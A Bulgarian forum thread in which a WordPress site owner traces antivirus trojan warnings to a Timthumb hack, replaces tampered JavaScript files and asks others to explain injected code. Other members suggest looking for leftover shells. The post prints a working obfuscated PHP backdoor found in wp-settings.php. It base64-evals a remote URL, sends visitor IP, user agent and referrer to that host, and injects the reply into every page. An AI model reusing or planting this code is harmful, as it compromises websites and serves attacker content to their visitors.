Вирус?

Firefly

Firefly

Well-Known Member
Здравейте,
на няколко пъти ми се случи като посещавам моята страница - iskamdaznam.com NOD32 да ми показва съобщение за вирус. Ще помоля на някой от тук, ако му излиза подобно нещо да напише какво точно му изкарва антивирусната. Дали проблемът е в сайта или е от страна на потребителите? Как се изчиства подобно нещо, ако е на wordpress-а?
 
От: Вирус?

На мен ми изкарваше опасност от някакви сайтове, които при проверка в гъгул не връщаха никакви резултати. Няколко потребителя писаха, че при тях пък им изкарва предупреждение за троянец...
 
От: Вирус?

Някои казват, че им дава съобщение за Iframe - JS:IFrame-DL [Trj]. Но не намирам някъде да е вкаран такъв в кода.
 
Последно редактирано:
От: Вирус?

Явно всичко е от гадния Timthumb хак от преди няколко дни. Сега забелязах, че jquery.js i l10n.js са по-големи отколкото би трябвало и ги замених с оригиналните. Съмнява ме обаче това да е всичко...
 
От: Вирус?

NOD 32 от време на време има навика да брои за вирус, всичко което не му е в базата данни за легални софртуери, скриптове и други подобни. Има ли вероятност сайта ти да има някои от тях. Даже и разработки пак могат да попаднат в това число. Посетих сайта - ОК е. в Гугъла не пише, че е вреден за потребителите. С коя версия си, и ако е нещо крак, не е нужно да се обеснява, че сам може да си квараш авто-гол. Пробвай с друг софтуер, както направи онлайн скан само на него. Виж какво ще ти кажат и съпорта на хоста, ако не намериш проблема. НО си мисля, че антивирусната играе лоша шега.
 
От: Вирус?

След подмяната на съмнителните джава файлове потребителите казват, че вече е наред. Предполагам при фиксването на щетите от Timthumb дупката, съм пропуснал да ги видя.

Благодаря за помощта, надявам се да няма други подобни corrupted файлове...
 
От: Вирус?

Днес websitedefender.com ми изкара няколко предупреждения за съмнителен код.

Намира се в wp-settings на wordpress инсталациите и представлява това:
function counter_wordpress() {$_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 2);$re = curl_exec($ch);curl_close($ch);echo $re;}add_action('wp_head', 'counter_wordpress');
do_action( 'init' );

Сравнявам с оригиналните файлове на wordpress и това го няма там. Следователно е инжектиран код. Може ли някой да каже какво прави? Откривам почти идентичен код и във functions.php на phpbb форума.
 
а ти след като запуши дупката почисти ли ? че може да е останал някъде скрит шел дори и вече да я нямаш
Дупка в wordpress теми с Timthumb - Важно


Възстановяване след хакнат сайт (wordpress и др))


виж дали освен основната тема която ползваш нямаш и друга неактивна тема с тимтумб качена timtumb е самостоятелен скрипт не е нужно да е активирана темата за да го дупчат нужно е да го има в някоя директория
 
Трябва да си влезнал или регистриран, за да отговориш тук.

Горе